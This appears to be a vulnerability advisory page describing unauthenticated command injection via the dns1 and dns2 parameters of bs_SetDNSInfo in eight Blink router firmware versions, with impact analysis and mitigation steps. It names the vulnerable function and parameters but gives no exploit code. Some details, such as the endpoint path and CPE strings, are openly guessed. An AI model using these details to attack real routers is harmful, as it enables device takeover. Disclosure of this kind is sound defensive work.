EUVD-2025-18262CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
4Tags
Description
Blink routers BL-WR9000 V2.4.9 , BL-AC2100_AZ3 V1.0.4, BL-X10_AC8 v1.0.5 , BL-LTE300 v1.2.3, BL-F1200_AT1 v1.0.0, BL-X26_AC8 v1.2.8, BLAC450M_AE4 v4.0.0 and BL-X26_DA3 v1.2.7 were discovered to contain multiple command injection vulnerabilities via the dns1 and dns2 parameters in the bs_SetDNSInfo function.
Analysis
Multiple Blink router models (8 distinct firmware versions across product lines) contain unauthenticated command injection vulnerabilities in the DNS configuration function (bs_SetDNSInfo), allowing remote attackers to execute arbitrary system commands with no authentication required. The CVSS 9.8 rating reflects the critical nature: network-exploitable, no privilege escalation needed, and complete compromise of confidentiality, integrity, and availability. While no KEV or public POC is documented in standard vulnerability databases as of this analysis, the combination of network accessibility and lack of authentication requirements makes this a high-priority threat for all affected Blink router owners.
Technical Context
The vulnerability resides in the bs_SetDNSInfo function, which processes DNS configuration parameters (dns1 and dns2) without proper input validation or sanitization. This is a classic CWE-77 (Improper Neutralization of Special Elements used in a Command) case where user-supplied input is concatenated directly into shell commands executed via system calls. The affected routers span multiple product lines (BL-WR9000, BL-AC2100, BL-X10, BL-LTE300, BL-F1200, BL-X26 variants) and hardware revisions, suggesting a common vulnerable codebase shared across Blink's router firmware. CPE identifiers would typically be structured as cpe:2.3:o:blink:*:firmware_version or cpe:2.3:h:blink:product_model for these embedded systems. The dns1/dns2 parameters are network-accessible via the router's web interface or API endpoints, requiring no authentication per the CVSS vector (PR:N), making exploitation trivial for any network-adjacent attacker.
Affected Products
Eight distinct Blink router models and firmware versions affected: (1) BL-WR9000 V2.4.9; (2) BL-AC2100_AZ3 V1.0.4; (3) BL-X10_AC8 v1.0.5; (4) BL-LTE300 v1.2.3; (5) BL-F1200_AT1 v1.0.0; (6) BL-X26_AC8 v1.2.8; (7) BLAC450M_AE4 v4.0.0; (8) BL-X26_DA3 v1.2.7. These span consumer (AC2100, X10) and specialty (LTE300) product lines, indicating widespread impact across Blink's portfolio. CPE equivalents would be: cpe:2.3:o:blink:bl-wr9000:2.4.9:*:*:*:*:*:*:*, cpe:2.3:o:blink:bl-ac2100_az3:1.0.4:*:*:*:*:*:*:*, and similarly for other models. No vendor advisory links are provided in the CVE description; contact Blink support or check their security page for official statements.
Remediation
Immediate actions: (1) Contact Blink support to obtain patched firmware versions for each affected model—do not assume firmware versions exist yet if not publicly announced; (2) If patches are available, perform immediate firmware updates on all affected routers via the web interface (Administration > Firmware Upgrade) or automatic update mechanisms; (3) Interim mitigations if patches unavailable: (a) Restrict router management interface access to trusted IPs via firewall rules or ACLs; (b) Disable remote management features if enabled (disable UPnP, disable WAN-side access to web interface); (c) Ensure strong administrative credentials (change default passwords immediately); (d) Segment router from critical network assets using VLAN isolation; (e) Monitor firewall logs for suspicious DNS configuration requests (POST to /dns_config or similar endpoints); (4) For all users: check Blink's official support page and security bulletin for patched firmware versions and deployment timeline. Do not delay—this is critical.
Priority Score
Share
External POC / Exploit Code
Leaving vuln.today